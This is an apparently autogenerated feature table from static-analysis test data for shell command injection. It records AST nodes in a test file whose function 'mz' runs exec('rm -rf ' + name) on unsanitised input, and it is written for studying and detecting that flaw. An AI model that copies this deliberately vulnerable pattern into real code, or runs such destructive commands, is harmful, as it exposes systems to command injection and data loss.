autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | 'arguments' object of anonymous function | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | exceptional return of anonymous function | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | exceptional return of anonymous function | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | functio ... T OK.\\n} | assignedToPropName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | functio ... T OK.\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | functio ... T OK.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | functio ... T OK.\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | return of anonymous function | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | return of anonymous function | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:51:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:31:49:34 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:8 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:8 | require | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:8 | require | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:8 | require | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:8 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | exceptional return of require ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | exceptional return of require ... ocess") | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | exceptional return of require ... ocess") | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | exceptional return of require ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:33 | require ... ").exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:33 | require ... ").exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:33 | require ... ").exec | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:33 | require ... ").exec | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:33 | require ... ").exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | exceptional return of require ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | exceptional return of require ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | exceptional return of require ... + name) | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | exceptional return of require ... + name) | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | exceptional return of require ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:10:50:27 | "mz/child_process" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:30:50:33 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:30:50:33 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:30:50:33 | exec | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:30:50:33 | exec | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:30:50:33 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:43 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:43 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:43 | "rm -rf " | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:43 | "rm -rf " | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:43 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 